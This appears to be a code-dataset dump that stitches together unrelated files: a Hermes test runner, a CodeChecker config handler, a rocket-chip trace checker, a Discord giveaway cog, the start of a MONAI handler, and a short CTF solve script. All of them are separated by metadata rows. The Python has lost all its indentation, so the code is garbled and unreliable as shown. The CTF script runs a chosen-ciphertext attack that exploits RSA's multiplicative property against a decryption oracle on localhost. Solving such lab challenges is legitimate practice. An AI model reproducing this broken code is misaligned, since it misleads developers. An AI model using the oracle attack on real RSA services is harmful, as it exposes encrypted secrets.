onlyfiles = [f for f in onlyfiles if f.endswith(".js") if not match or match in f]
# Generates the source for the single provided file,
# without an extra "use strict" directive prepended to the file.
# Handles [noStrict] and [onlyStrict] flags.
if source:
if len(onlyfiles) != 1:
print("Need exactly one file matched by the -m/--match option.")
print("Got these files: " + ", ".join(onlyfiles))
sys.exit(1)
with open(onlyfiles[0], "rb") as f:
content = f.read().decode("utf-8")
match = flagsMatcher.search(content)
flags = set()
if match:
flags = {flag.strip() for flag in match.group(1).split(",")}
strict = False
if "noStrict" in flags or "raw" in flags:
strict = False
if "onlyStrict" in flags:
strict = True
print(generateSource(content, strict, getSuite(onlyfiles[0]), flags)[0])
sys.exit(0)
rangeLeft = 0
rangeRight = len(onlyfiles) - 1
if chunk != -1:
if chunk == 0:
rangeRight = rangeRight // 3 - 1
elif chunk == 1:
rangeLeft = rangeRight // 3
rangeRight = rangeRight - rangeLeft
elif chunk == 2:
rangeLeft = rangeRight - rangeRight // 3 + 1
else:
print("Invalid chunk ID")
sys.exit(1)
if not os.path.isfile(join(binary_path, "hermes")):
print("{} not found.".format(join(binary_path, "hermes")))
sys.exit(1)
if not os.path.isfile(join(binary_path, hvm)):
print("{} not found.".format(join(binary_path, hvm)))
sys.exit(1)
esprima_runner = esprima.EsprimaTestRunner(verbose)
calls = makeCalls(
(test_skiplist, keep_tmp, binary_path, hvm, esprima_runner),
onlyfiles,
rangeLeft,
rangeRight,
)
results, resultsHist, slowest_tests = testLoop(
calls, jobs, fail_fast, num_slowest_tests
)
# Sort the results for easier reading of failed tests.
results.sort(key=lambda f: f[1][0].value)
if results:
print("")
for testName, (hermesStatus, errString, _) in results:
if show_all or (
(hermesStatus != TestFlag.TEST_PASSED)
and (hermesStatus != TestFlag.TEST_SKIPPED)
and (hermesStatus != TestFlag.TEST_PERMANENTLY_SKIPPED)
):
print("{} {}".format(str(hermesStatus), testName))
if errString:
print("{}".format(textwrap.indent(errString, "\t")))
if slowest_tests:
print()
print("Top {:d} slowest tests".format(len(slowest_tests)))
maxNameWidth = 0
maxNumWidth = 0
for testName, duration in slowest_tests:
maxNameWidth = max(maxNameWidth, len(testName))
maxNumWidth = max(maxNumWidth, len("{:.3f}".format(duration)))
for testName, duration in slowest_tests:
print(
"{:<{testNameWidth}} {:>{durationWidth}.3f}".format(
testName,
duration,
# Add 3 just in case it's right at the borderline
testNameWidth=maxNameWidth + 3,
durationWidth=maxNumWidth,
)
)
print()
total = sum(resultsHist.values())
failed = (
resultsHist[TestFlag.COMPILE_FAILED]
+ resultsHist[TestFlag.COMPILE_TIMEOUT]
+ resultsHist[TestFlag.EXECUTE_FAILED]
+ resultsHist[TestFlag.EXECUTE_TIMEOUT]
+ resultsHist[TestFlag.TEST_UNEXPECTED_PASSED]
)
eligible = (
sum(resultsHist.values())
- resultsHist[TestFlag.TEST_SKIPPED]
- resultsHist[TestFlag.TEST_PERMANENTLY_SKIPPED]
)
if eligible > 0:
passRate = "{0:.2%}".format(resultsHist[TestFlag.TEST_PASSED] / eligible)
else:
passRate = "--"
if (eligible - resultsHist[TestFlag.TEST_PASSED]) > 0:
resultStr = "{}FAIL{}".format(Color.RED, Color.RESET)
else:
resultStr = "{}PASS{}".format(Color.GREEN, Color.RESET)
# Turn off formatting so that the table looks nice in source code.
# fmt: off
print("-----------------------------------")
print("| Results | {} |".format(resultStr))
print("|----------------------+----------|")
print("| Total | {:>8} |".format(total))
print("| Pass | {:>8} |".format(resultsHist[TestFlag.TEST_PASSED]))
print("| Fail | {:>8} |".format(failed))
print("| Skipped | {:>8} |".format(resultsHist[TestFlag.TEST_SKIPPED]))
print("| Permanently Skipped | {:>8} |".format(resultsHist[TestFlag.TEST_PERMANENTLY_SKIPPED]))
print("| Pass Rate | {:>8} |".format(passRate))
print("-----------------------------------")
print("| Failures | |")
print("|----------------------+----------|")
print("| Compile fail | {:>8} |".format(resultsHist[TestFlag.COMPILE_FAILED]))
print("| Compile timeout | {:>8} |".format(resultsHist[TestFlag.COMPILE_TIMEOUT]))
print("| Execute fail | {:>8} |".format(resultsHist[TestFlag.EXECUTE_FAILED]))
print("| Execute timeout | {:>8} |".format(resultsHist[TestFlag.EXECUTE_TIMEOUT]))
if test_skiplist:
print("| Skiplisted passes | {:>8} |".format(resultsHist[TestFlag.TEST_UNEXPECTED_PASSED]))
print("-----------------------------------")
# fmt: on
return (eligible - resultsHist[TestFlag.TEST_PASSED]) > 0
| 34.410714
| 102
| 0.569907
|
fb290dc711627dd9d2620f483426a24bc92ece67
| 10,454
|
py
|
Python
|
analyzer/codechecker_analyzer/analyzers/config_handler.py
|
gargaroff/codechecker
|
f3574a373f454dc57f813225af6e54824f194e23
|
[
"Apache-2.0"
] | null | null | null |
analyzer/codechecker_analyzer/analyzers/config_handler.py
|
gargaroff/codechecker
|
f3574a373f454dc57f813225af6e54824f194e23
|
[
"Apache-2.0"
] | null | null | null |
analyzer/codechecker_analyzer/analyzers/config_handler.py
|
gargaroff/codechecker
|
f3574a373f454dc57f813225af6e54824f194e23
|
[
"Apache-2.0"
] | null | null | null |
# -------------------------------------------------------------------------
#
# Part of the CodeChecker project, under the Apache License v2.0 with
# LLVM Exceptions. See LICENSE for license information.
# SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
#
# -------------------------------------------------------------------------
"""
Static analyzer configuration handler.
"""
from abc import ABCMeta
from operator import itemgetter
import collections
import platform
import subprocess
import sys
from codechecker_common.logger import get_logger
LOG = get_logger('system')
# The baseline handling of checks in every analyzer is to let the analysis
# engine decide which checks are worthwhile run. Checks handled this way
# (implicitly by the analyzer) are considered to have a CheckerState of
# default. If the check however appears in profiles, and such a profile is
# enabled explicitly on the command-line or implicitly as in case of the
# default profile, then they are considered to have a CheckerState of enabled.
# Likewise for individually enabled checks. If a check is however explicitly
# disabled on the command-line, or belongs to a profile explicitly disabled
# on the command-line, then it is considered to have a CheckerState of
# disabled.
# TODO: Use enum when upgrading to Python3.
class CheckerState(object):
default = 0
disabled = 1
enabled = 2
STATES = {'default', 'disabled', 'enabled'}
NAMES = {0: 'default', 1: 'disabled', 2: 'enabled'}
class AnalyzerConfigHandler(object, metaclass=ABCMeta):
"""
Handle the checker configurations and enabled disabled checkers lists.
"""
def __init__(self):
self.analyzer_binary = None
self.analyzer_plugins_dir = None
self.analyzer_extra_arguments = []
self.checker_config = ''
self.report_hash = None
# The key is the checker name, the value is a tuple.
# False if disabled (should be by default).
# True if checker is enabled.
# (False/True, 'checker_description')
self.__available_checkers = collections.OrderedDict()
@property
def analyzer_plugins(self):
""" Full path of the analyzer plugins. """
return []
def get_version(self, env=None):
""" Get analyzer version information. """
version = [self.analyzer_binary, '--version']
try:
output = subprocess.check_output(version,
env=env,
universal_newlines=True,
encoding="utf-8",
errors="ignore")
return output
except (subprocess.CalledProcessError, OSError) as oerr:
LOG.warning("Failed to get analyzer version: %s",
' '.join(version))
LOG.warning(oerr)
return None
def add_checker(self, checker_name, description='',
state=CheckerState.default):
"""
Add additional checker. If no state argument is given, the actual usage
of the checker is handled by the analyzer.
"""
self.__available_checkers[checker_name] = (state, description)
def set_checker_enabled(self, checker_name, enabled=True):
"""
Explicitly handle checker state, keep description if already set.
"""
for ch_name, values in self.__available_checkers.items():
if ch_name.startswith(checker_name) or \
ch_name.endswith(checker_name):
_, description = values
state = CheckerState.enabled if enabled \
else CheckerState.disabled
self.__available_checkers[ch_name] = (state, description)
def checks(self):
"""
Return the checkers.
"""
return self.__available_checkers
def __gen_name_variations(self):
"""
Generate all applicable name variations from the given checker list.
"""
checker_names = (name for name in self.__available_checkers)
reserved_names = []
for name in checker_names:
delim = '.' if '.' in name else '-'
parts = name.split(delim)
# Creates a list of variations from a checker name, e.g.
# ['security', 'security.insecureAPI', 'security.insecureAPI.gets']
# from 'security.insecureAPI.gets' or
# ['misc', 'misc-dangling', 'misc-dangling-handle']
# from 'misc-dangling-handle'.
v = [delim.join(parts[:(i + 1)]) for i in range(len(parts))]
reserved_names += v
return reserved_names
def initialize_checkers(self,
analyzer_context,
checkers,
cmdline_enable=[],
enable_all=False):
"""
Add checkers and set their "enabled/disabled" status. The following
inputs are considered in this order:
- First the default state is taken based on the analyzer tool.
- Members of "default" profile are enabled.
- In case of "--enable-all" every checker is enabled except for "alpha"
and "debug" checker groups. "osx" checker group is also not included
unless the target platform is Darwin.
- Command line "--enable/--disable" flags.
- Their arguments may start with "profile:" or "guideline:" prefix
which makes the choice explicit.
- Without prefix it means a profile name, a guideline name or a
checker group/name in this priority order.
analyzer_context -- Context object.
checkers -- [(checker name, description), ...] Checkers to add with
their description.
cmdline_enable -- [(argument, enabled), ...] Arguments of
"--enable/--disable" flags and a boolean value
whether it is after "--enable" or not.
enable_all -- Boolean value whether "--enable-all" is given.
"""
profile_map = analyzer_context.profile_map
guideline_map = analyzer_context.guideline_map
if 'profile:list' in map(itemgetter(0), cmdline_enable):
LOG.error("'list' is a reserved profile keyword. ")
LOG.error("Please choose another profile name in "
"%s/config/checker_profile_map.json and rebuild.",
analyzer_context.package_root)
sys.exit(1)
if 'guideline:list' in map(itemgetter(0), cmdline_enable):
LOG.error("'list' is a reserved guideline keyword. ")
LOG.error("Please choose another guideline name in "
"%s/config/checker_guideline_map.json and rebuild.",
analyzer_context.package_root)
sys.exit(1)
# Add all checkers marked as default. This means the analyzer should
# manage whether it is enabled or disabled.
for checker_name, description in checkers:
self.add_checker(checker_name, description)
# Set default enabled or disabled checkers, based on the config file.
default_profile_checkers = profile_map.by_profile('default')
if not default_profile_checkers:
# Check whether a default profile exists.
LOG.warning("No default profile found!")
else:
# Turn default checkers on.
for checker in default_profile_checkers:
self.set_checker_enabled(checker)
# If enable_all is given, almost all checkers should be enabled.
if enable_all:
for checker_name, enabled in checkers:
if not checker_name.startswith("alpha.") and \
not checker_name.startswith("debug.") and \
not checker_name.startswith("osx."):
# There are a few exceptions, though, which still need to
# be manually enabled by the user: alpha and debug.
self.set_checker_enabled(checker_name)
if checker_name.startswith("osx.") and \
platform.system() == 'Darwin':
# OSX checkers are only enable-all'd if we are on OSX.
self.set_checker_enabled(checker_name)
# Set user defined enabled or disabled checkers from the command line.
# Construct a list of reserved checker names.
# (It is used to check if a profile name is valid.)
reserved_names = self.__gen_name_variations()
for identifier, enabled in cmdline_enable:
if identifier.startswith('profile:'):
profile_name = identifier[len('profile:'):]
if profile_name not in profile_map.available_profiles():
LOG.error('No such profile: %s', profile_name)
sys.exit(1)
for checker in profile_map.by_profile(profile_name):
self.set_checker_enabled(checker, enabled)
if identifier.startswith('guideline:'):
guideline_name = identifier[len('guideline:'):]
if guideline_name not in guideline_map.available_guidelines():
LOG.error('No such guideline: %s', guideline_name)
sys.exit(1)
for checker in guideline_map.by_guideline(guideline_name):
self.set_checker_enabled(checker, enabled)
elif identifier in profile_map.available_profiles():
if identifier in reserved_names:
LOG.warning("Profile name '%s' conflicts with a "
"checker(-group) name.", identifier)
for checker in profile_map.by_profile(identifier):
self.set_checker_enabled(checker, enabled)
elif identifier in guideline_map.available_guidelines():
if identifier in reserved_names:
LOG.warning("Guideline name '%s' conflicts with a "
"checker(-group) name.", identifier)
for checker in guideline_map.by_guideline(identifier):
self.set_checker_enabled(checker, enabled)
else:
self.set_checker_enabled(identifier, enabled)
| 43.377593
| 79
| 0.594892
|
5d59faa16860e4129ae3024106a55e47cfab96db
| 2,151
|
py
|
Python
|
scripts/check_cache_trace.py
|
NeHalem90/rocket-chip
|
90d4ccd720f7bad0a62c99b55f057b2e50ace218
|
[
"Apache-2.0"
] | 1,199
|
2019-06-18T23:08:07.000Z
|
2022-03-31T08:21:58.000Z
|
scripts/check_cache_trace.py
|
NeHalem90/rocket-chip
|
90d4ccd720f7bad0a62c99b55f057b2e50ace218
|
[
"Apache-2.0"
] | 656
|
2019-06-20T09:21:59.000Z
|
2022-03-31T15:37:04.000Z
|
scripts/check_cache_trace.py
|
NeHalem90/rocket-chip
|
90d4ccd720f7bad0a62c99b55f057b2e50ace218
|
[
"Apache-2.0"
] | 495
|
2019-06-19T01:38:31.000Z
|
2022-03-31T11:42:23.000Z
|
import sys
from collections import defaultdict
# Checks a trace of cache transactions to make sure the data is correct
# Note: this will only work if the L2 agent only receives cached traffic
# (either caching Acquires or Releases). If there are any builtin
# Put or PutBlock requests, they will not be reflected in the trace
# and the data will appear to be incorrect.
DATA_BEATS = 8
def parse_prm(fname):
mem_data_bits = 0
cache_block_bytes = 0
with open(fname) as f:
for line in f:
line = line.strip("() \t\n")
parts = line.split(",")
if parts[0] == "MEM_DATA_BITS":
mem_data_bits = int(parts[1])
elif parts[1] == "CACHE_BLOCK_BYTES":
cache_block_bytes = int(parts[1])
DATA_BEATS = (cache_block_bytes * 8) / mem_data_bits
def data_block():
return [0] * DATA_BEATS
blocks = defaultdict(data_block)
def process_release(addr_block, addr_beat, data):
blocks[addr_block][addr_beat] = data
def process_get(addr_block, addr_beat, data):
stored_data = blocks[addr_block][addr_beat]
if stored_data != data:
print("Error {:07x},{}: {:016x} != {:016x}".format(
addr_block, addr_beat, stored_data, data))
def process_line(line):
if not line:
return
pieces = line.split()
if pieces[0] == "[release]":
addr_block = int(pieces[1].split('=')[1], 16)
addr_beat = int(pieces[2].split('=')[1])
data = int(pieces[3].split('=')[1], 16)
process_release(addr_block, addr_beat, data)
if pieces[0] == "[get]":
addr_block = int(pieces[1].split('=')[1], 16)
addr_beat = int(pieces[2].split('=')[1])
data = int(pieces[3].split('=')[1], 16)
process_get(addr_block, addr_beat, data)
def check_trace(fname):
with open(fname) as f:
for line in f:
process_line(line.strip())
if __name__ == "__main__":
if len(sys.argv) < 2:
print("Usage: {} trace.out [params.prm]".format(sys.argv[0]))
sys.exit(-1)
if len(sys.argv) > 2:
parse_prm(sys.argv[2])
check_trace(sys.argv[1])
| 32.590909
| 72
| 0.611808
|
893318527a7c4bba4f3cf74454c101ac7fd37e53
| 18,915
|
py
|
Python
|
giveaways/gset.py
|
Shukla-G/cray-cogs
|
b852194ed373912c002be05be7216f7bfe54dc19
|
[
"MIT"
] | null | null | null |
giveaways/gset.py
|
Shukla-G/cray-cogs
|
b852194ed373912c002be05be7216f7bfe54dc19
|
[
"MIT"
] | null | null | null |
giveaways/gset.py
|
Shukla-G/cray-cogs
|
b852194ed373912c002be05be7216f7bfe54dc19
|
[
"MIT"
] | null | null | null |
from typing import Union
import discord
from redbot.core import commands
from redbot.core.bot import Red
from redbot.core.utils.chat_formatting import box, humanize_list
from .main import Giveaways
from .models import config, get_guild_settings, get_role
class Gset(Giveaways, name="Giveaways"):
"""
Host embedded giveaways in your server with the help of reactions.
This cog is a very complex cog and could be resource intensive on your bot.
Use `giveaway explain` command for an indepth explanation on how to use the commands."""
def __init__(self, bot: Red):
super().__init__(bot)
@commands.group(
name="giveawaysettings", aliases=["gset", "giveawaysetting"], invoke_without_command=True
)
@commands.admin_or_permissions(administrator=True)
async def gset(self, ctx):
"""
Customize giveaways to how you want them.
All subcommands represent a separate settings."""
await ctx.send_help("gset")
@gset.command(name="gmsg", usage="<message>")
@commands.admin_or_permissions(administrator=True)
async def gset_gmsg(self, ctx, *, message):
"""
Set a custom giveaway message.
This message shows above the giveaway embed."""
settings = await get_guild_settings(ctx.guild.id, False)
await settings.msg.set(message)
await ctx.reply(f"The new giveaway message has been set to \n```\n{message}\n```")
@gset.command(name="tmsg")
@commands.admin_or_permissions(administrator=True)
async def gset_tmsg(self, ctx, *, message):
"""
Set a custom message for giveaways.
This message gets sent in an embed when you use the `--thank` flag while starting a giveaway.
Usable variables:
- donor :
donor.mention
donor.display_name
donor.name
donor.id
- prize
Use these variables within curly brackets.
For Example:
`[p]gset tmsg Donated by: {donor.mention}
Prize: **{prize}**
Please thank **{donor.name}** in #general`"""
settings = await get_guild_settings(ctx.guild.id, False)
await settings.tmsg.set(message)
await ctx.reply(f"The new giveaway message has been set to \n```\n{message}\n```")
@gset.command(name="emoji", usage="<emoji>")
@commands.admin_or_permissions(administrator=True)
async def gset_emoji(self, ctx, emoji: Union[discord.Emoji, discord.PartialEmoji]):
"""
Set a custom giveaway emoji that the bot reacts with on giveaway embeds.
The bot must have access to the emoji to be used."""
settings = await get_guild_settings(ctx.guild.id, False)
await settings.emoji.set(str(emoji))
await ctx.reply(f"The new giveaway emoji has been set to {emoji}")
@gset.command(name="winnerdm", usage="<status>")
@commands.admin_or_permissions(administrator=True)
async def gset_winnerdm(self, ctx, status: bool):
"""
Set whether the bot dms the winners when the giveaway ends.
This won't be able to dm if the winners have their dms closed."""
settings = await get_guild_settings(ctx.guild.id, False)
await settings.winnerdm.set(status)
await ctx.reply(
"The winner will be dm'ed when the giveaway ends now."
if status == True
else "The winner will not be dm'ed when the giveaway ends."
)
@gset.command(name="hostdm", usage="<status>")
@commands.admin_or_permissions(administrator=True)
async def gset_hostdm(self, ctx, status: bool):
"""
Set whether the bot dms the host when the giveaway ends.
This won't be able to dm if the host has their dms closed."""
settings = await get_guild_settings(ctx.guild.id, False)
await settings.hostdm.set(status)
await ctx.reply(
"The host will be dm'ed when the giveaway ends now."
if status == True
else "The host will not be dm'ed when the giveaway ends."
)
@gset.command(name="endmsg", usage="<message>")
@commands.admin_or_permissions(administrator=True)
async def gset_endmsg(self, ctx, *, message):
"""
Set the message that gets sent when a giveaway ends.
Usable variables:
- prize : The prize of the giveaway
- winner : The winner(s) of the giveaway
- link : The jumplink to the giveaway.
For example:
`[p]gset endmsg Congratulations {winner}! You have won the givaway for **{prize}**.
{link}`"""
settings = await get_guild_settings(ctx.guild.id, False)
await settings.endmsg.set(message)
await ctx.reply(f"The ending message has been changed to\n```\n{message}\n```")
@gset.command(name="manager", aliases=["managers"])
@commands.admin_or_permissions(administrator=True)
async def gset_manager(self, ctx, *roles: discord.Role):
"""
Set roles that can manage giveaways in your server.
If you dont set this up, users will need either manage messages permission or the server's bot mod role."""
if not roles:
return await ctx.send(
"You need to provide proper role ids or mentions to add them as managers"
)
settings = await get_guild_settings(ctx.guild.id, False)
async with settings.manager() as managers:
roles = set(roles)
managers += [role.id for role in roles]
await ctx.reply(
f"{humanize_list([role.mention for role in roles])} have been set as the giveaway managers!",
allowed_mentions=discord.AllowedMentions(roles=False, replied_user=False),
)
@gset.command(name="pingrole", usage="<role>")
@commands.admin_or_permissions(administrator=True)
async def gset_pingrole(self, ctx, role: discord.Role):
"""
Set which role gets pinged in giveaways.
This only takes effect when the `--ping` flag is used in giveaways."""
settings = await get_guild_settings(ctx.guild.id, False)
await settings.pingrole.set(role.id)
await ctx.reply(
f"{role.mention} has been set as the pingrole!",
allowed_mentions=discord.AllowedMentions(roles=False, replied_user=False),
)
@gset.command(name="autodelete", aliases=["autodel"])
@commands.guild_only()
@commands.admin_or_permissions(administrator=True)
async def gset_autodelete(self, ctx, toggle: bool):
"""
Set whether giveaway command invocations get automatically deleted or not.
Pass true to delete and false to not."""
settings = await get_guild_settings(ctx.guild.id, False)
await settings.autodelete.set(toggle)
await ctx.reply(
"Giveaway commands will automatically delete now."
if toggle == True
else "Giveaway commands will retain."
)
@gset.command(name="blacklist", aliases=["bl"])
@commands.guild_only()
@commands.admin_or_permissions(administrator=True)
@commands.bot_has_permissions(embed_links=True)
async def gset_blacklist(self, ctx, roles: commands.Greedy[discord.Role] = None):
"""
Blacklist roles from giveaway permanently without having to pass them as requirements each time.
You can send multiple role ids or mentions.
Sending nothing will show a list of blacklisted roles."""
if not roles:
settings = await get_guild_settings(ctx.guild.id)
roles = settings.blacklist
return await ctx.send(
embed=discord.Embed(
title=f"Giveaway Blacklisted Roles in `{ctx.guild.name}`!",
description="\n\n".join(
[
ctx.guild.get_role(role).mention
for role in roles
if ctx.guild.get_role(role)
]
)
if roles
else "No roles have been blacklisted from giveaways permanently.",
color=discord.Color.green(),
)
)
settings = await get_guild_settings(ctx.guild.id, False)
async with settings.blacklist() as bl:
failed = []
for role in roles:
if not role.id in bl:
bl.append(role.id)
else:
failed.append(f"`{role.name}`")
return await ctx.send(
f"Blacklisted {humanize_list([f'`@{role.name}`' for role in roles])} permanently from giveaways."
+ (f"{humanize_list(failed)} were already blacklisted." if failed else "")
)
@gset.command(name="unblacklist", aliases=["ubl"])
@commands.guild_only()
@commands.admin_or_permissions(administrator=True)
@commands.bot_has_permissions(embed_links=True)
async def gset_unblacklist(self, ctx, roles: commands.Greedy[discord.Role]):
"""
Unblacklist previously blacklisted roles from giveaways."""
settings = await get_guild_settings(ctx.guild.id, False)
async with settings.blacklist() as bl:
failed = []
for role in roles:
if role.id in bl:
bl.remove(role.id)
else:
failed.append(f"`{role.name}`")
return await ctx.send(
f"UnBlacklisted {humanize_list([f'`@{role.name}`' for role in roles])} permanently from giveaways."
+ (f"{humanize_list(failed)} were never blacklisted" if failed else "")
)
@gset.group(name="bypass", aliases=["by"], invoke_without_command=True)
@commands.guild_only()
@commands.admin_or_permissions(administrator=True)
@commands.bot_has_permissions(embed_links=True)
async def gset_bypass(self, ctx):
"""
See a list of roles that can bypass requirements in giveaways.
Use subcommands for more specific actions."""
settings = await get_guild_settings(ctx.guild.id)
roles = settings.bypass
return await ctx.send(
embed=discord.Embed(
title=f"Role Bypasses for `{ctx.guild.name}`!",
description="\n\n".join(
[
ctx.guild.get_role(role).mention
for role in roles
if ctx.guild.get_role(role)
]
)
if roles
else "No role bypasses set in this server.",
color=discord.Color.green(),
)
)
@gset_bypass.command(name="add", aliases=["a"])
@commands.guild_only()
@commands.admin_or_permissions(administrator=True)
@commands.bot_has_permissions(embed_links=True)
async def gset_bypass_add(self, ctx, *roles: discord.Role):
"""
Add one or more roles to the server's bypass list."""
settings = await get_guild_settings(ctx.guild.id, False)
async with settings.bypass() as by:
failed = []
for role in roles:
if role.id not in by:
by.append(role.id)
else:
failed.append(f"`{role.name}`")
return await ctx.send(
f"Added giveaway bypass to {humanize_list([f'`@{role.name}`' for role in roles])}."
+ (f"{humanize_list(failed)} were never allowed to bypass" if failed else "")
)
@gset_bypass.command(name="remove", aliases=["r"])
@commands.guild_only()
@commands.admin_or_permissions(administrator=True)
@commands.bot_has_permissions(embed_links=True)
async def gset_bypass_remove(self, ctx, *roles: discord.Role):
"""
Remove one or more roles from the server's bypass list."""
settings = await get_guild_settings(ctx.guild.id, False)
async with settings.bypass() as by:
failed = []
for role in roles:
if role.id in by:
by.remove(role.id)
else:
failed.append(f"`{role.name}`")
return await ctx.send(
f"Removed giveaway bypass from {humanize_list([f'`@{role.name}`' for role in roles])}."
+ (f"{humanize_list(failed)} were never allowed to bypass" if failed else "")
)
@gset.group(name="multi", aliases=["rolemulti", "rm"])
@commands.guild_only()
@commands.admin_or_permissions(administrator=True)
@commands.bot_has_permissions(embed_links=True)
async def gset_multi(self, ctx):
"""
See a list for all roles that have multipliers in giveaways in this server."""
roles = await config.all_roles()
roles = [
ctx.guild.get_role(role)
for role in filter(lambda x: ctx.guild.get_role(x) is not None, roles)
]
return await ctx.send(
embed=discord.Embed(
title=f"Role Multipliers for `{ctx.guild.name}`'s giveaways!",
description=box(
"\n\n".join(
[f"@{k.name:<10} {'<'+'-'*15+'>':>5} {v:>5}" for k, v in roles.items()]
)
if roles
else "No role multipliers set in this server."
),
color=discord.Color.green(),
)
)
@gset_multi.command(name="add", aliases=["a"])
@commands.guild_only()
@commands.admin_or_permissions(administrator=True)
@commands.bot_has_permissions(embed_links=True)
async def role_multi_add(self, ctx, role: discord.Role, multi: int):
"""
Add a multipier to a given role.
This will increase the chances of the members of that role to win in giveaways."""
if multi > 5:
return await ctx.send("Multiplier can not be greater than 5.")
settings = await get_role(role.id)
await settings.multi.set(multi)
return await ctx.send(
f"Added `{role.name}` with multiplier `{multi}` to the server's role multipliers."
)
@gset_multi.command(name="remove", aliases=["r"])
@commands.guild_only()
@commands.admin_or_permissions(administrator=True)
@commands.bot_has_permissions(embed_links=True)
async def role_multi_remove(self, ctx, role: discord.Role):
"""
Remove multiplier from a given role."""
settings = await get_role(role.id)
await settings.multi.set(None)
return await ctx.send(f"Removed `{role.name}` from the server's role multipliers.")
@gset.command(name="color", aliases=["colour"])
@commands.admin_or_permissions(administrator=True)
async def gset_colour(self, ctx, colour: discord.Colour = discord.Color(0x303036)):
"""
Set the colour of giveaways embeds.
if color is not passed, it will default to invisible embeds.
Before this command is used, the global bot color will be used.
Default is invisible (0x303036)."""
settings = await get_guild_settings(ctx.guild.id, False)
await settings.color.set(colour.value)
embed = discord.Embed(
title="Color successfully set!",
description=f"Embed colors for giveaways will now be set to `{colour.value}`",
color=colour,
).set_image(
url=f"https://singlecolorimage.com/get/{str(colour)[1:]}/400x100.png"
) # i love this api *chef kiss*
return await ctx.send(embed=embed)
@gset.command(name="sdr", aliases=["show_default_requirements", "showdefault", "showdefaults"])
@commands.admin_or_permissions(administrator=True)
async def gset_sdr(self, ctx):
"""
Set whether the default requirements set through `[p]gset bypass/blacklist` should be shown in the giveaway embed.
If set to False, the requirements would still be applied but not shown in the embed itself."""
settings = await get_guild_settings(ctx.guild.id, False)
current = await settings.show_defaults()
await settings.show_defaults.set(not current)
return await ctx.send(
f"Showing default requirements in giveaway embeds has been {'enabled' if not current else 'disabled'}."
)
@gset.command(name="unreactdm", aliases=["urdm"])
@commands.admin_or_permissions(administrator=True)
async def gset_urdm(self, ctx: commands.Context, status: bool):
"""
Set whether the user is informed when their reaction is removed from a giveaway message.
"""
settings = await get_guild_settings(ctx.guild.id, False)
await settings.unreactdm.set(status)
await ctx.reply(
"The user will be dmed if their reaction is removed from the giveaway."
if status == True
else "The user will not be dm'ed when their reaction is removed."
)
@gset.command(name="showsettings", aliases=["ss", "show", "showset"])
@commands.admin_or_permissions(administrator=True)
@commands.bot_has_permissions(embed_links=True)
async def gset_show(self, ctx):
"""
See giveaway settings configured for your server"""
settings = await get_guild_settings(ctx.guild.id)
message = settings.msg
tmsg = settings.tmsg
emoji = settings.emoji
winnerdm = settings.winnerdm
hostdm = settings.hostdm
endmsg = settings.endmsg
managers = settings.manager
autodelete = settings.autodelete
color = discord.Color(settings.color) if settings.color else await ctx.embed_color()
show_defaults = settings.show_defaults
embed = discord.Embed(
title=f"Giveaway Settings for **__{ctx.guild.name}__**",
description=f"""
**Giveaway Managers:** {humanize_list([ctx.guild.get_role(manager).mention for manager in managers if ctx.guild.get_role(manager)]) if managers else "No managers set. Requires manage message permission or bot's mod role."}
**Message:** {message}
**Reaction Emoji:** {emoji}
**Will the winner be dm'ed?:** {winnerdm}
**Will the host be dm'ed?:** {hostdm}
**Will users be dmed if their reaction is removed?:** {settings.unreactdm}
**Auto delete Giveaway Commands?:** {autodelete}
**Embed color: **{color}
**Show defaults in giveaway embed?: **{show_defaults}
**Giveaway Thank message:** {box(tmsg)}
**Giveaway Ending message:** {box(endmsg)}\n
""",
color=color,
)
embed.set_footer(text=ctx.guild.name, icon_url=ctx.guild.icon_url)
embed.set_thumbnail(url=ctx.guild.icon_url)
await ctx.send(embed=embed)
| 40.590129
| 222
| 0.614433
|
20794bb8094ef25c92834e59328a484528ce2701
| 708
|
py
|
Python
|
crypto/rocket-ship-academy/solve.py
|
zeyu2001/STANDCON-Challenges
|
ba302a01e0f644c7fc84ca6c64f24ad5b4a082e0
|
[
"MIT"
] | 3
|
2021-07-25T11:01:21.000Z
|
2022-03-28T13:31:36.000Z
|
crypto/rocket-ship-academy/solve.py
|
zeyu2001/STANDCON-Challenges
|
ba302a01e0f644c7fc84ca6c64f24ad5b4a082e0
|
[
"MIT"
] | null | null | null |
crypto/rocket-ship-academy/solve.py
|
zeyu2001/STANDCON-Challenges
|
ba302a01e0f644c7fc84ca6c64f24ad5b4a082e0
|
[
"MIT"
] | null | null | null |
from Crypto.Util.number import long_to_bytes
from pwn import *
from decimal import *
import re
getcontext().prec = 100000000
pattern = "n = (\d+)\ne = (\d+)\nc = (\d+)"
conn = remote('localhost', '12345')
received = conn.recv().decode()
matches = re.search(pattern, received)
n, e, c = int(matches[1]), int(matches[2]), int(matches[3])
print('n =', n)
print('e =', e)
print('c =', c)
print()
ciphertext = Decimal(c) * ((2 ** Decimal(e)) % Decimal(n)) % Decimal(n)
print('Ciphertext:', ciphertext)
conn.send(str(ciphertext) + '\r\n')
received = conn.recv().decode()
matches = re.search("Decrypted: (\d+)\n", received)
decrypted = int(matches[1])
print()
print(long_to_bytes(Decimal(decrypted) / 2))
| 21.454545
| 71
| 0.649718
|
6753cafcb0b4c296f3309ce45bfc1ec85949ba53
| 3,569
|
py
|
Python
|
monai/handlers/classification_saver.py
|
RobinCamarasa/MONAI
|
8207e1e2a3555ddc3fe938e058552651900dc951
|
[
"Apache-2.0"
] | null | null | null |
monai/handlers/classification_saver.py
|
RobinCamarasa/MONAI
|
8207e1e2a3555ddc3fe938e058552651900dc951
|
[
"Apache-2.0"
] | null | null | null |
monai/handlers/classification_saver.py
|
RobinCamarasa/MONAI
|
8207e1e2a3555ddc3fe938e058552651900dc951
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020 - 2021 MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from typing import TYPE_CHECKING, Callable, Optional
from monai.data import CSVSaver
from monai.utils import exact_version, optional_import
Events, _ = optional_import("ignite.engine", "0.4.2", exact_version, "Events")
if TYPE_CHECKING:
from ignite.engine import Engine
else:
Engine, _ = optional_import("ignite.engine", "0.4.2", exact_version, "Engine")
class ClassificationSaver:
"""
Event handler triggered on completing every iteration to save the classification predictions as CSV file.
"""
def __init__(
self,
